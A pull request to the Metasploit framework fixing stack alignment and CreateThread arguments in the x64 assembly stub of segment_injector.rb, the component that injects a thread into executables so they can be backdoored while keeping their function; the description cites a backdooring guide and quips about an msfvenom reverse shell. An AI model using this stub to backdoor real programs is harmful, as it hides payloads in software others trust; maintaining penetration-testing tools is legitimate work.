### PR TITLE
Fixed segment_injector.rb x64 shellcode

### DIFF
--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -72,10 +72,9 @@ module Exe
         xor ecx, ecx
         mov qword ptr [rsp+28h], rcx
         mov qword ptr [rsp+20h], rcx
-        mov r9, 0
+        mov r9, rcx
         mov r8, thread_hook
-        mov rdx, 0
-        mov rcx, 0
+        mov rdx, rcx
         call rax
 
         add rsp, 38h

--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -58,27 +58,27 @@ module Exe
 
     def create_thread_stub_x64
       <<-EOS
+        sub rsp, 38h
+
         mov rcx, hook_libname
-        sub rsp, 30h
         mov rax, iat_LoadLibraryA
         call [rax]
-        add rsp, 30h
 
         mov rdx, hook_funcname
         mov rcx, rax
-        sub rsp, 30h
         mov rax, iat_GetProcAddress
         call [rax]
-        add rsp, 30h
 
-        push 0
-        push 0
+        xor ecx, ecx
+        mov qword ptr [rsp+28h], rcx
+        mov qword ptr [rsp+20h], rcx
         mov r9, 0
         mov r8, thread_hook
         mov rdx, 0
         mov rcx, 0
         call rax
-        add rsp,10h ; clean up the push 0 above
+
+        add rsp, 38h
 
         jmp entrypoint
 

--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -58,6 +58,9 @@ module Exe
 
     def create_thread_stub_x64
       <<-EOS
+        push rbp
+        mov rbp, rsp
+        and rsp, FFFFFFFFFFFFFFF0h
         sub rsp, 38h
 
         mov rcx, hook_libname
@@ -77,8 +80,7 @@ module Exe
         mov rdx, rcx
         call rax
 
-        add rsp, 38h
-
+        leave
         jmp entrypoint
 
         hook_libname db 'kernel32', 0


### PR DESCRIPTION
During an evaluation of our [ZecOps Crash Analysis solution](https://www.zecops.com/solutions/crash-analysis-for-endpoints-servers), one of our partners brought to our attention an interesting crash. He claimed that he followed this guide: [Backdooring While Preserving Functionality](https://jamesonhacking.blogspot.com/2018/06/preserving-functionality-when.html), but the backdoored app crashed right away. Looking at the crash, we quickly spotted the problem: due to an unaligned stack pointer, the process crashed on an SMID instruction (movaps). For a short explanation, see: https://stackoverflow.com/a/5540149

While composing the pull request, I found another problem - the call to `CreateThread` wasn't done properly. Not only the stack pointer was unaligned and no shadow stack was reserved, but also the two zeros pushed on the stack weren't the actual parameters 5 and 6. The fact that this code even worked is pure accident, probably because the Windows loader happens to set the proper locations on the stack  to zero. In any case, that's fixed as well.

I did a quick check, the new shellcode should work properly, but I'm not 100% sure about the syntax, I didn't check it with the tooling. As one smart researcher once said:
> [Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit?](https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/f55e6abd47cb3a4f771c965053a5a92133a18781/exploit.py#L89)

:)
